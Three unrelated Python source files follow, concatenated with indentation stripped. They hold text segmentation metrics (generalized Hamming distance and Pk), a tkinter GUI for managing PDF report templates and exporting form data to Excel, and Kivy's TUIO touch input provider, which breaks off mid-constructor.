:param hyp: the hypothetical segmentation
:type hyp: str or list
:param ins_cost: insertion cost
:type ins_cost: float
:param del_cost: deletion cost
:type del_cost: float
:param shift_cost_coeff: constant used to compute the cost of a shift.
shift cost = shift_cost_coeff * |i - j| where i and j are
the positions indicating the shift
:type shift_cost_coeff: float
:param boundary: boundary value
:type boundary: str or int or bool
:rtype: float
"""
ref_idx = [i for (i, val) in enumerate(ref) if val == boundary]
hyp_idx = [i for (i, val) in enumerate(hyp) if val == boundary]
nref_bound = len(ref_idx)
nhyp_bound = len(hyp_idx)
if nref_bound == 0 and nhyp_bound == 0:
return 0.0
elif nref_bound > 0 and nhyp_bound == 0:
return nref_bound * ins_cost
elif nref_bound == 0 and nhyp_bound > 0:
return nhyp_bound * del_cost
mat = _init_mat(nhyp_bound + 1, nref_bound + 1, ins_cost, del_cost)
_ghd_aux(mat, hyp_idx, ref_idx, ins_cost, del_cost, shift_cost_coeff)
return mat[-1, -1]
# Beeferman's Pk text segmentation evaluation metric
def pk(ref, hyp, k=None, boundary='1'):
"""
Compute the Pk metric for a pair of segmentations A segmentation
is any sequence over a vocabulary of two items (e.g. "0", "1"),
where the specified boundary value is used to mark the edge of a
segmentation.
>>> s1 = "00000010000000001000000"
>>> s2 = "00000001000000010000000"
>>> s3 = "00010000000000000001000"
>>> pk(s1, s1, 3)
0.0
>>> pk(s1, s2, 3)
0.095238...
>>> pk(s2, s3, 3)
0.190476...
:param ref: the reference segmentation
:type ref: str or list
:param hyp: the segmentation to evaluate
:type hyp: str or list
:param k: window size, if None, set to half of the average reference segment length
:type boundary: str or int or bool
:param boundary: boundary value
:type boundary: str or int or bool
:rtype: float
"""
if k is None:
k = int(round(len(ref) / (ref.count(boundary) * 2.)))
n_considered_seg = len(ref) - k + 1
n_same_ref = 0.0
n_false_alarm = 0.0
n_miss = 0.0
for i in xrange(n_considered_seg):
bsame_ref_seg = False
bsame_hyp_seg = False
if boundary not in ref[(i+1):(i+k)]:
n_same_ref += 1.0
bsame_ref_seg = True
if boundary not in hyp[(i+1):(i+k)]:
bsame_hyp_seg = True
if bsame_hyp_seg and not bsame_ref_seg:
n_miss += 1
if bsame_ref_seg and not bsame_hyp_seg:
n_false_alarm += 1
prob_same_ref = n_same_ref / n_considered_seg
prob_diff_ref = 1 - prob_same_ref
prob_miss = n_miss / n_considered_seg
prob_false_alarm = n_false_alarm / n_considered_seg
return prob_miss * prob_diff_ref + prob_false_alarm * prob_same_ref
if __name__ == "__main__":
import doctest
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
|
####################################################################################################
# The MIT License (MIT)
#
# Copyright (c) 2015, Alexander I. Mykyta
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
####################################################################################################
import copy
import re
import glob
import os
import fnmatch
import logging
import tkinter as tk
from tkinter import ttk
from tkinter import filedialog
from tkinter import messagebox
from .python_modules import tk_extensions as tkext
from . import form_data
from . import report_template
from . import report_entries
log = logging.getLogger("gui")
def trim_path(path, maxlen):
if(len(path) <= maxlen):
return(path)
else:
path = "..." + path[-maxlen+3:]
return(path)
####################################################################################################
# GUI Windows
####################################################################################################
class TemplateBrowser(tkext.Dialog):
#---------------------------------------------------------------
# Widgets
#---------------------------------------------------------------
def create_body(self, master_fr):
#--------------------------------------------------------
# Template list and Description container frame
template_area_fr = ttk.Frame(
master_fr,
padding=3
)
template_area_fr.pack(
side = tk.LEFT,
fill=tk.BOTH,
expand = True
)
# Description box
desc_fr = ttk.Labelframe(
template_area_fr,
text="Description",
padding=3
)
desc_fr.pack(side = tk.BOTTOM, fill = tk.X)
self.txt_desc = tk.Text(
desc_fr,
wrap = tk.WORD,
width = 50,
height = 5
)
self.txt_desc.pack(
fill = tk.X,
expand = True
)
self.txt_desc.configure(state=tk.DISABLED)
# Template List
self.rt_list = tk.Listbox(
template_area_fr,
highlightthickness = 0,
selectmode = "single",
exportselection = False,
activestyle = "none"
)
self.rt_list.bind('<<ListboxSelect>>', self.ev_rt_list_Select)
self.rt_list.bind("<Double-Button-1>", self.ev_rt_list_DoubleClick)
self.rt_list.pack(
side = tk.LEFT,
fill = tk.BOTH,
expand = True
)
# Template list scrollbar
rt_list_scroll = ttk.Scrollbar(template_area_fr)
rt_list_scroll.pack(
side = tk.RIGHT,
fill = tk.Y
)
# Link scrollbar <--> list
self.rt_list.configure(yscrollcommand=rt_list_scroll.set)
rt_list_scroll.configure(command=self.rt_list.yview)
#--------------------------------------------------------
# Button group container frame
buttons_fr = ttk.Frame(master_fr,
padding=3)
buttons_fr.pack(side = tk.RIGHT, fill=tk.Y)
# Top button group container frame
top_buttons_fr = ttk.Frame(buttons_fr)
top_buttons_fr.pack(side = tk.TOP)
x = ttk.Button(
top_buttons_fr,
text="Create New",
command = self.ev_but_New
)
x.pack(fill=tk.X)
x = ttk.Button(
top_buttons_fr,
text="Edit",
command = self.ev_but_Edit
)
x.pack(fill=tk.X)
x = ttk.Button(
top_buttons_fr,
text="Copy",
command = self.ev_but_Copy
)
x.pack(fill=tk.X)
x = ttk.Button(
top_buttons_fr,
text="Delete",
command = self.ev_but_Delete
)
x.pack(fill=tk.X)
#--------------------------------------------------------
# Global layout
# window is not allowed to be any smaller than default
self.tkWindow.update_idletasks() #Give Tk a chance to update widgets and figure out the window size
self.tkWindow.minsize(self.tkWindow.winfo_width(), self.tkWindow.winfo_height())
#---------------------------------------------------------------
# Helpers
#---------------------------------------------------------------
def set_desc_text(self, str):
self.txt_desc.configure(state=tk.NORMAL)
self.txt_desc.delete(0.0, tk.END)
self.txt_desc.insert(tk.END, str)
self.txt_desc.configure(state=tk.DISABLED)
def set_ev_selection(self, idx):
if(len(self.templates) == 0):
# No templates left!
self.set_desc_text("")
return
elif(idx >= len(self.templates)):
idx = len(self.templates) - 1
self.rt_list.selection_clear(0,tk.END)
self.rt_list.selection_set(idx)
self.rt_list.see(idx)
self.set_desc_text(self.templates[idx].description)
#---------------------------------------------------------------
# Events
#---------------------------------------------------------------
def __init__(self, parent, templates):
self.templates = templates
self.selected_template = None # dialog result
title = "Select Report Template"
tkext.Dialog.__init__(self, parent, title)
def dlg_initialize(self):
for T in self.templates:
self.rt_list.insert(tk.END, T.name)
# preselect something
self.set_ev_selection(0)
def ev_rt_list_Select(self, ev):
idx = self.rt_list.curselection()
if(len(idx)):
idx = int(idx[0])
self.set_desc_text(self.templates[idx].description)
def ev_rt_list_DoubleClick(self, ev):
self.dlg_pbOK()
def ev_but_New(self):
options = {}
options['defaultextension'] = '.pdf'
options['filetypes'] = [('PDF file', '.pdf')]
options['title'] = 'Select a Template PDF'
filename = filedialog.askopenfilename(**options)
if(not filename):
return
try:
T = report_template.ReportTemplate.from_pdf(filename)
except ValueError as exc:
messagebox.showerror(
title = "New Report Template",
message = "Selected file is not a valid PDF."
)
return
# Initialized. Jump into the editor
TE = TemplateEditor(self.tkWindow, T, "New Report Template")
if(TE.result):
# Template created. Insert edited template into the list & the GUI
self.templates.append(TE.T)
self.rt_list.insert(tk.END, TE.T.name)
self.set_ev_selection(len(self.templates)-1)
def ev_but_Edit(self):
idx = self.rt_list.curselection()
if(len(idx)):
idx = int(idx[0])
TE = TemplateEditor(self.tkWindow, self.templates[idx], "Edit Report Template")
if(TE.result):
# edited. replace with edited instance
self.templates[idx] = TE.T
self.rt_list.delete(idx)
self.rt_list.insert(idx, self.templates[idx].name)
self.set_ev_selection(idx)
def ev_but_Copy(self):
idx = self.rt_list.curselection()
if(len(idx)):
idx = int(idx[0])
C = copy.deepcopy(self.templates[idx])
# remove any trailing " (copy ##)"
C.name = re.sub("\s\(copy(?: \d+)?\)$", "", C.name)
# Augment the copy's name so that it is unique
newname = C.name + " (copy)"
n = 0
while(True):
for t in self.templates:
if(t.name == newname):
n = n + 1
newname = C.name + " (copy %d)" % n
break
else:
break
C.name = newname
self.templates.insert(idx+1, C)
self.rt_list.insert(idx+1, C.name)
self.set_ev_selection(idx+1)
def ev_but_Delete(self):
idx = self.rt_list.curselection()
if(len(idx)):
idx = int(idx[0])
res = messagebox.askyesno(
title = "Delete Report Template",
icon = messagebox.WARNING,
message = "Are you sure you want to delete '%s'?" % self.templates[idx].name
)
if(res):
del self.templates[idx]
self.rt_list.delete(idx)
self.set_ev_selection(idx)
def dlg_validate(self):
idx = self.rt_list.curselection()
if(len(idx) == 0):
messagebox.showerror(
title = "Select Template",
message = "You must select a template first."
)
return(False)
return True
def dlg_apply(self):
idx = self.rt_list.curselection()
idx = int(idx[0])
self.selected_template = self.templates[idx]
#===================================================================================================
class TemplateEditor(tkext.Dialog):
#---------------------------------------------------------------
# Widgets
#---------------------------------------------------------------
def create_body(self, master_fr):
tabs = ttk.Notebook(master_fr)
tabs.pack(fill=tk.BOTH, expand=True)
# "General" Tab
self.tab_General = TE_tab_General(self.T, tabs)
# "Report Entries" Tab
self.tab_ReportEntries = TE_tab_ReportEntries(self.T, tabs)
#---------------------------------------------------------------
# Dialog Events
#---------------------------------------------------------------
def __init__(self, parent, Template, title = None):
# Make copy of the template for local editing.
self.T = copy.deepcopy(Template)
tkext.Dialog.__init__(self, parent, title)
def dlg_initialize(self):
pass
def dlg_validate(self):
if(not self.tab_General.tab_validate()):
return(False)
if(not self.tab_ReportEntries.tab_validate()):
return(False)
return(True)
def dlg_apply(self):
self.tab_General.tab_apply()
self.tab_ReportEntries.tab_apply()
class TE_tab_General:
def __init__(self, Template, tab_book):
self.T = Template
self.tab_book = tab_book
self.tab_index = tab_book.index(tk.END)
self.create_widgets(tab_book)
self.init_widgets()
def show(self):
self.tab_book.select(self.tab_index)
def create_widgets(self, tab_book):
tab_fr = ttk.Frame(tab_book, padding=5)
tab_book.add(tab_fr, text="General")
# Row 0 - Name
x = ttk.Label(tab_fr, text="Template Name")
x.grid(row=0, column=0, sticky=(tk.N, tk.E))
self.txt_name = ttk.Entry(tab_fr)
self.txt_name.grid(row=0, column=1, sticky=(tk.E, tk.W))
# Row 1 - Description
x = ttk.Label(tab_fr, text="Description")
x.grid(row=1, column=0, sticky=(tk.N, tk.E))
self.txt_desc = tk.Text(
tab_fr,
wrap = tk.WORD,
width = 50,
height = 5
)
self.txt_desc.grid(row=1, column=1, sticky=(tk.E, tk.W))
tab_fr.columnconfigure(1, weight=1)
tab_fr.columnconfigure(tk.ALL, pad=5)
tab_fr.rowconfigure(tk.ALL, pad=5)
def init_widgets(self):
self.txt_name.insert(tk.END, self.T.name)
self.txt_desc.insert(tk.END, self.T.description)
def tab_validate(self):
if(len(self.txt_name.get()) == 0):
messagebox.showerror(
title = "Template Name",
message = "Template name cannot be empty."
)
self.show()
self.txt_name.focus_set()
return(False)
return(True)
def tab_apply(self):
self.T.name = self.txt_name.get()
self.T.description = self.txt_desc.get("1.0",'end-1c')
class TE_tab_ReportEntries:
def __init__(self, Template, tab_book):
self.T = Template
self.tab_book = tab_book
self.tab_index = tab_book.index(tk.END)
# Container for type-specific entry settings
self.entry_type_settings_frame = None
self.entry_type_settings_widgets = None
self.current_idx = None
self.create_widgets(tab_book)
self.init_widgets()
def show(self):
self.tab_book.select(self.tab_index)
def create_widgets(self, tab_book):
tab_fr = ttk.Frame(tab_book, padding=5)
tab_book.add(tab_fr, text="Report Entries")
entries_fr = ttk.Labelframe(
tab_fr,
text="Entries",
padding=5
)
entries_fr.grid(row=0, column=0, sticky=(tk.N, tk.S, tk.E, tk.W))
# Entry list and scrollbar
entry_list_scroll = ttk.Scrollbar(entries_fr)
entry_list_scroll.pack(
side = tk.RIGHT,
fill = tk.Y
)
self.entry_list = tk.Listbox(
entries_fr,
highlightthickness = 0,
activestyle = "none",
exportselection = False,
selectmode = "single"
)
self.entry_list.bind('<<ListboxSelect>>', self.ev_entry_list_select)
self.entry_list.pack(
side = tk.RIGHT,
fill = tk.BOTH,
expand = True
)
self.entry_list.configure(yscrollcommand=entry_list_scroll.set)
entry_list_scroll.configure(command=self.entry_list.yview)
# Entry List side buttons
ent_but_fr = ttk.Frame(entries_fr, padding=5)
ent_but_fr.pack(
side = tk.LEFT,
fill = tk.Y,
expand = True
)
x = ttk.Button(ent_but_fr,
text="Add",
command=self.pb_new_entry
)
x.pack(side = tk.TOP)
x = ttk.Button(ent_but_fr,
text="Delete",
command=self.pb_delete_entry
)
x.pack(side = tk.TOP)
x = ttk.Button(ent_but_fr,
text="Down",
command=self.pb_move_entry_down
)
x.pack(side = tk.BOTTOM)
x = ttk.Button(ent_but_fr,
text="Up",
command=self.pb_move_entry_up
)
x.pack(side = tk.BOTTOM)
# ------------- Entry Settings Section -------------
self.entry_settings_frame = ttk.Labelframe(tab_fr,
text="Entry Settings",
padding=5
)
self.entry_settings_frame.grid(row=0, column=1, sticky=(tk.N, tk.S, tk.E, tk.W))
# Common Settings
ent_common_settings_fr = ttk.Frame(self.entry_settings_frame)
ent_common_settings_fr.pack(side=tk.TOP, fill=tk.X)
x = ttk.Label(ent_common_settings_fr, text="Entry Type")
x.grid(row=0, column=0, sticky=(tk.N, tk.E))
self.cmb_ent_type = ttk.Combobox(
ent_common_settings_fr,
state= 'readonly',
values= report_entries.get_type_names()
)
self.cmb_ent_type.grid(row=0, column=1, sticky=(tk.N, tk.W, tk.E))
self.cmb_ent_type.bind("<<ComboboxSelected>>", self.cmb_ent_type_Changed)
x = ttk.Label(ent_common_settings_fr, text="Entry Name")
x.grid(row=1, column=0, sticky=(tk.N, tk.E))
self.txt_ent_name = ttk.Entry(
ent_common_settings_fr,
validatecommand=self.txt_ent_name_Changed,
validate='focusout'
)
self.txt_ent_name.grid(row=1, column=1, sticky=(tk.N, tk.W, tk.E))
ent_common_settings_fr.columnconfigure(1, weight=1)
ent_common_settings_fr.columnconfigure(tk.ALL, pad=5)
ent_common_settings_fr.rowconfigure(tk.ALL, pad=5)
x = ttk.Separator(self.entry_settings_frame)
x.pack(side=tk.TOP, fill=tk.X)
# Type-Specific Settings
self.entry_type_settings_frame = ttk.Frame(self.entry_settings_frame)
self.entry_type_settings_frame.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
tab_fr.columnconfigure(1, weight=1)
tab_fr.rowconfigure(tk.ALL, weight=1)
# Hide settings by default (until something is selected)
self.entry_settings_frame.grid_remove()
def init_widgets(self):
# load entry list with names
for e in self.T.entries:
self.entry_list.insert(tk.END, e.name)
def tab_validate(self):
return(True)
# FYI: NOT the apply button, but the apply event when OKing the dialog window
def tab_apply(self):
# nothing to do here. fields are applied to self.T automatically
pass
#---------------------------------------------------------------
# Helpers
#---------------------------------------------------------------
def set_entry_selection(self, idx):
if(len(self.T.entries) == 0):
# List is empty
self.entry_settings_frame.grid_remove()
self.entry_type_settings_widgets = None
self.current_idx = None
return
elif(idx >= len(self.T.entries)):
idx = len(self.T.entries) - 1
self.entry_list.selection_clear(0,tk.END)
self.entry_list.selection_set(idx)
self.entry_list.see(idx)
# set up common entry settings widgets
self.cmb_ent_type.current(report_entries.get_type_idx(type(self.T.entries[idx])))
self.txt_ent_name.delete(0, tk.END)
self.txt_ent_name.insert(tk.END, self.T.entries[idx].name)
# if previous type-specific entry settings are showing, remove them.
if(self.entry_type_settings_widgets):
self.entry_type_settings_widgets.destroy()
# show new type-specific entry settings
self.entry_type_settings_widgets = report_entries.CreateSettings(self.T.entries[idx], self.entry_type_settings_frame)
self.current_idx = idx;
# unhide settings region
self.entry_settings_frame.grid()
#---------------------------------------------------------------
# Widget Events
#---------------------------------------------------------------
def ev_entry_list_select(self, ev):
idx = self.entry_list.curselection()
if(len(idx)):
idx = int(idx[0])
# If a previous entry is showing, force the txt_ent_name changed event
# since the event doesn't fire normally when this is clicked
if(self.current_idx != None):
# switch selection back to the previous idx
self.entry_list.selection_clear(0,tk.END)
self.entry_list.selection_set(self.current_idx)
# force the "changed" dialog
res = self.txt_ent_name_Changed()
if(res == False):
return
self.set_entry_selection(idx)
def pb_move_entry_up(self):
idx = self.entry_list.curselection()
if(len(idx) == 0):
return
idx = int(idx[0])
if(idx <= 0):
return
E = self.T.entries.pop(idx)
self.entry_list.delete(idx)
self.T.entries.insert(idx-1, E)
self.entry_list.insert(idx-1, E.name)
self.entry_list.selection_set(idx-1)
self.current_idx = (idx-1)
def pb_move_entry_down(self):
idx = self.entry_list.curselection()
if(len(idx) == 0):
return
idx = int(idx[0])
if(idx >= len(self.T.entries)-1):
return
E = self.T.entries.pop(idx)
self.entry_list.delete(idx)
self.T.entries.insert(idx+1, E)
self.entry_list.insert(idx+1, E.name)
self.entry_list.selection_set(idx+1)
self.current_idx = (idx+1)
def pb_new_entry(self):
# determine a unique name
name = "New Entry"
n = 0
while(True):
for e in self.T.entries:
if(e.name == name):
n = n + 1
name = "New Entry %d" % n
break
else:
break
# create new entry data object
entry_t = report_entries.get_default_type()
E = entry_t(self.T, name)
# Add it to the template
self.T.entries.append(E)
# Add it to the GUI
self.entry_list.insert(tk.END, E.name)
# select it
self.set_entry_selection(len(self.T.entries)-1)
def pb_delete_entry(self):
idx = self.entry_list.curselection()
if(len(idx)):
idx = int(idx[0])
del self.T.entries[idx]
self.entry_list.delete(idx)
self.set_entry_selection(idx)
def txt_ent_name_Changed(self):
idx = self.entry_list.curselection()[0]
new_name = self.txt_ent_name.get()
# check if name is non-empty
if(len(new_name) == 0):
messagebox.showerror(
title = "Entry Name",
message = "Entry name cannot be empty."
)
self.txt_ent_name.focus_set()
return(False)
# check if name is unique
for i,e in enumerate(self.T.entries):
if(i != idx):
if(e.name == new_name):
messagebox.showerror(
title = "Entry Name",
message = "Entry name must be unique"
)
self.txt_ent_name.focus_set()
return(False)
self.T.entries[idx].name = new_name
self.entry_list.delete(idx)
self.entry_list.insert(idx, self.T.entries[idx].name)
self.entry_list.selection_set(idx)
return(True)
def cmb_ent_type_Changed(self,ev):
type_idx = self.cmb_ent_type.current()
entry_idx = self.entry_list.curselection()[0]
# create new entry data object. preserve the name
entry_t = report_entries.get_type(type_idx)
name = self.T.entries[entry_idx].name
E = entry_t(self.T, name)
# replace old entry data object
self.T.entries[entry_idx] = E
# force redraw of the settings
self.set_entry_selection(entry_idx)
#===================================================================================================
class FormImporter(tk.Tk):
#---------------------------------------------------------------
# Widgets
#---------------------------------------------------------------
def create_widgets(self):
self.title("Import Forms: %s" % self.T.name)
#--------------------------------------------------------
# File List
file_list_fr = ttk.Frame(
self,
padding=3
)
file_list_fr.pack(
side = tk.TOP,
fill=tk.BOTH,
expand = True
)
self.file_list = tk.Listbox(
file_list_fr,
highlightthickness = 0,
selectmode = "single",
exportselection = False,
activestyle = "none",
width = 100,
height = 20
)
self.file_list.bind('<<ListboxSelect>>', self.ev_file_list_Select)
self.file_list.pack(
side = tk.LEFT,
fill = tk.BOTH,
expand = True
)
# scrollbar
file_list_scroll = ttk.Scrollbar(file_list_fr)
file_list_scroll.pack(
side = tk.RIGHT,
fill = tk.Y
)
# Link scrollbar <--> list
self.file_list.configure(yscrollcommand=file_list_scroll.set)
file_list_scroll.configure(command=self.file_list.yview)
#--------------------------------------------------------
# Bottom Buttons
bottom_buttons_fr = ttk.Frame(
self,
padding=3
)
bottom_buttons_fr.pack(
side = tk.TOP,
fill=tk.BOTH
)
x = ttk.Button(
bottom_buttons_fr,
text="Import PDFs",
command = self.ev_but_import
)
x.pack(side=tk.LEFT)
x = ttk.Button(
bottom_buttons_fr,
text="Import Folder of PDFs",
command = self.ev_but_import_dir
)
x.pack(side=tk.LEFT)
x = ttk.Button(
bottom_buttons_fr,
text="Remove",
command = self.ev_but_remove
)
x.pack(side=tk.LEFT)
x = ttk.Button(
bottom_buttons_fr,
text="Export to Excel",
command = self.ev_but_export
)
x.pack(side=tk.RIGHT)
# window is not allowed to be any smaller than default
self.update_idletasks() #Give Tk a chance to update widgets and figure out the window size
self.minsize(self.winfo_width(), self.winfo_height())
#---------------------------------------------------------------
# Helpers
#---------------------------------------------------------------
def set_selection(self, idx):
if(len(self.Forms) == 0):
# List is empty
return
elif(idx >= len(self.Forms)):
idx = len(self.Forms) - 1
self.file_list.selection_clear(0,tk.END)
self.file_list.selection_set(idx)
self.file_list.see(idx)
def add_form(self, filename):
# check if it already exists
for f in self.Forms:
if(f.filename == filename):
return
log.info("Loading: %s" % filename)
F = form_data.FormData(filename)
self.Forms.append(F)
self.file_list.insert(tk.END, F.filename)
# Validate the form
if(F.valid):
if(self.T.is_matching_form(F) == False):
log.warning("Form fingerprint mismatch. Not valid: %s" % F.filename)
F.valid = False
if(not F.valid):
self.file_list.itemconfigure(tk.END, background="red")
def remove_form(self, idx):
if(len(self.Forms) == 0):
# List is empty
return
elif(idx >= len(self.Forms)):
return
del self.Forms[idx]
self.file_list.delete(idx)
self.set_selection(idx)
#---------------------------------------------------------------
# Events
#---------------------------------------------------------------
def __init__(self, parent, Template):
self.T = Template
self.Forms = []
tk.Tk.__init__(self, parent)
self.create_widgets()
def ev_file_list_Select(self, ev):
idx = self.file_list.curselection()
if(len(idx) == 0):
return
idx = int(idx[0])
def ev_but_import(self):
options = {}
options['defaultextension'] = '.pdf'
options['filetypes'] = [('PDF files', '.pdf')]
options['parent'] = self
options['title'] = 'Open...'
filenames = filedialog.askopenfilenames(**options)
if(not filenames):
return
# define a separate worker function to import the PDFs
def worker(dlg_if, filenames):
dlg_if.set_progress(0)
n_found = len(filenames)
n_done = 0;
for f in filenames:
dlg_if.set_status1("Processing files: %d/%d" % (n_done + 1, n_found))
dlg_if.set_status2(trim_path(f, 50))
dlg_if.set_progress(100*n_done/n_found)
if(dlg_if.stop_requested()):
return
f = os.path.abspath(f)
self.add_form(f)
# Start the job
args={'filenames':filenames}
x = tkext.ProgressBox(
job_func = worker,
job_data = args,
parent = self,
title = "Importing PDFs..."
)
self.set_selection(len(self.Forms)-1)
def ev_but_import_dir(self):
options = {}
options['mustexist'] = True
options['parent'] = self
options['title'] = 'Recursive Open'
dir = filedialog.askdirectory(**options)
if(not dir):
return
dir = os.path.abspath(dir)
# define a separate worker function to import the PDFs
def worker(dlg_if, start_dir):
dlg_if.set_progress(0)
dlg_if.set_status1("Gathering files...")
n_found = 0
matches = []
for root, dirnames, filenames in os.walk(dir):
if(dlg_if.stop_requested()):
return
for filename in fnmatch.filter(filenames, '*.pdf'):
matches.append(os.path.join(root, filename))
n_found = n_found + 1
dlg_if.set_status2("Found: %d" % n_found)
n_done = 0
for f in matches:
dlg_if.set_status1("Processing files: %d/%d" % (n_done + 1, n_found))
dlg_if.set_status2(trim_path(f, 50))
dlg_if.set_progress(100*n_done/n_found)
if(dlg_if.stop_requested()):
return
self.add_form(f)
n_done = n_done + 1
# Start the job
args={'start_dir':dir}
x = tkext.ProgressBox(
job_func = worker,
job_data = args,
parent = self,
title = "Importing PDFs..."
)
self.set_selection(len(self.Forms)-1)
def ev_but_remove(self):
idx = self.file_list.curselection()
if(len(idx)):
idx = int(idx[0])
self.remove_form(idx)
def ev_but_export(self):
options = {}
options['defaultextension'] = '.xlsx'
options['filetypes'] = [('Excel Workbook', '.xlsx'), ('Excel 97-2003 Workbook', '.xls')]
options['parent'] = self
options['title'] = 'Export as Excel...'
filename = filedialog.asksaveasfilename(**options)
if(not filename):
return
TBL = report_template.DataTable()
TBL.init_blank(self.T)
for form in self.Forms:
if(form.valid):
form_report = self.T.create_report(form)
TBL.append_row(form_report)
TBL.export_excel(filename)
|
|
'''
TUIO Input Provider
===================
TUIO is the de facto standard network protocol for the transmission of touch and
fiducial information between a server and a client.
To learn more about TUIO (which is itself based on the OSC protocol), please
refer to http://tuio.org -- The specification should be of special interest.
Configure a TUIO provider in the config.ini
-------------------------------------------
The TUIO provider can be configured in the configuration file in the
``[input]`` section::
[input]
# name = tuio,<ip>:<port>
multitouchtable = tuio,192.168.0.1:3333
Configure a TUIO provider in the App
------------------------------------
You must add the provider before your application is run, like this::
from kivy.app import App
from kivy.config import Config
class TestApp(App):
def build(self):
Config.set('input', 'multitouchscreen1', 'tuio,0.0.0.0:3333')
# You can also add a second TUIO listener
# Config.set('input', 'source2', 'tuio,0.0.0.0:3334')
# Then do the usual things
# ...
return
'''
__all__ = ('TuioMotionEventProvider', 'Tuio2dCurMotionEvent',
'Tuio2dObjMotionEvent')
from kivy.lib import osc
from collections import deque
from kivy.input.provider import MotionEventProvider
from kivy.input.factory import MotionEventFactory
from kivy.input.motionevent import MotionEvent
from kivy.input.shape import ShapeRect
from kivy.logger import Logger
class TuioMotionEventProvider(MotionEventProvider):
'''The TUIO provider listens to a socket and handles some of the incoming
OSC messages:
* /tuio/2Dcur
* /tuio/2Dobj
You can easily extend the provider to handle new TUIO paths like so::
# Create a class to handle the new TUIO type/path
# Replace NEWPATH with the pathname you want to handle
class TuioNEWPATHMotionEvent(MotionEvent):
def __init__(self, id, args):
super(TuioNEWPATHMotionEvent, self).__init__(id, args)
def depack(self, args):
# In this method, implement 'unpacking' for the received
# arguments. you basically translate from TUIO args to Kivy
# MotionEvent variables. If all you receive are x and y
# values, you can do it like this:
if len(args) == 2:
self.sx, self.sy = args
self.profile = ('pos', )
self.sy = 1 - self.sy
super(TuioNEWPATHMotionEvent, self).depack(args)
# Register it with the TUIO MotionEvent provider.
# You obviously need to replace the PATH placeholders appropriately.
TuioMotionEventProvider.register('/tuio/PATH', TuioNEWPATHMotionEvent)
.. note::
The class name is of no technical importance. Your class will be
associated with the path that you pass to the ``register()``
function. To keep things simple, you should name your class after the
path that it handles, though.
'''
__handlers__ = {}
def __init__(self, device, args):
super(TuioMotionEventProvider, self).__init__(device, args)
args = args.split(',')
if len(args) <= 0:
Logger.error('Tuio: Invalid configuration for TUIO provider')
Logger.error('Tuio: Format must be ip:port (eg. 127.0.0.1:3333)')
err = 'Tuio: Actual configuration is <%s>' % (str(','.join(args)))
Logger.error(err)
return None
ipport = args[0].split(':')
if len(ipport) != 2:
Logger.error('Tuio: Invalid configuration for TUIO provider')
Logger.error('Tuio: Format must be ip:port (eg. 127.0.0.1:3333)')
err = 'Tuio: Actual configuration is <%s>' % (str(','.join(args)))
Logger.error(err)
return None
self.ip, self.port = args[0].split(':')
self.port = int(self.port)
self.handlers = {}
self.oscid = None
self.tuio_event_q = deque()
self.touches = {}
@staticmethod
def register(oscpath, classname):
'''Register a new path to handle in TUIO provider'''
TuioMotionEventProvider.__handlers__[oscpath] = classname
@staticmethod
def unregister(oscpath, classname):
'''Unregister a path to stop handling it in the TUIO provider'''
if oscpath in TuioMotionEventProvider.__handlers__:
del TuioMotionEventProvider.__handlers__[oscpath]
@staticmethod
def create(oscpath, **kwargs):
'''Create a touch event from a TUIO path'''
if oscpath not in TuioMotionEventProvider.__handlers__:
raise Exception('Unknown %s touch path' % oscpath)
return TuioMotionEventProvider.__handlers__[oscpath](**kwargs)
def start(self):
'''Start the TUIO provider'''
self.oscid = osc.listen(self.ip, self.port)
for oscpath in TuioMotionEventProvider.__handlers__:
self.touches[oscpath] = {}
osc.bind(self.oscid, self._osc_tuio_cb, oscpath)
def stop(self):
'''Stop the TUIO provider'''
osc.dontListen(self.oscid)
def update(self, dispatch_fn):
'''Update the TUIO provider (pop events from the queue)'''
# deque osc queue
osc.readQueue(self.oscid)
# read the Queue with event
while True:
try:
value = self.tuio_event_q.pop()
except IndexError:
# queue is empty, we're done for now
return
self._update(dispatch_fn, value)
def _osc_tuio_cb(self, *incoming):
message = incoming[0]
oscpath, types, args = message[0], message[1], message[2:]
self.tuio_event_q.appendleft([oscpath, args, types])
def _update(self, dispatch_fn, value):
oscpath, args, types = value
command = args[0]
# verify commands
if command not in ['alive', 'set']:
return
# move or create a new touch
if command == 'set':
id = args[1]
if id not in self.touches[oscpath]:
# new touch
touch = TuioMotionEventProvider.__handlers__[oscpath](
self.device, id, args[2:])
self.touches[oscpath][id] = touch
dispatch_fn('begin', touch)
else:
# update a current touch
touch = self.touches[oscpath][id]
touch.move(args[2:])
dispatch_fn('update', touch)
# alive event, check for deleted touch
if command == 'alive':
alives = args[1:]
to_delete = []
for id in self.touches[oscpath]:
if not id in alives:
# touch up
touch = self.touches[oscpath][id]
if not touch in to_delete:
to_delete.append(touch)
for touch in to_delete:
dispatch_fn('end', touch)
del self.touches[oscpath][touch.id]
class TuioMotionEvent(MotionEvent):
'''Abstraction for TUIO touches/fiducials.
Depending on the tracking software you use (e.g. Movid, CCV, etc.) and its
TUIO implementation, the TuioMotionEvent object can support multiple
profiles such as:
* Fiducial ID: profile name 'markerid', attribute ``.fid``
* Position: profile name 'pos', attributes ``.x``, ``.y``
* Angle: profile name 'angle', attribute ``.a``
* Velocity vector: profile name 'mov', attributes ``.X``, ``.Y``
* Rotation velocity: profile name 'rot', attribute ``.A``
* Motion acceleration: profile name 'motacc', attribute ``.m``
* Rotation acceleration: profile name 'rotacc', attribute ``.r``
'''
__attrs__ = ('a', 'b', 'c', 'X', 'Y', 'Z', 'A', 'B', 'C', 'm', 'r')
def __init__(self, device, id, args):
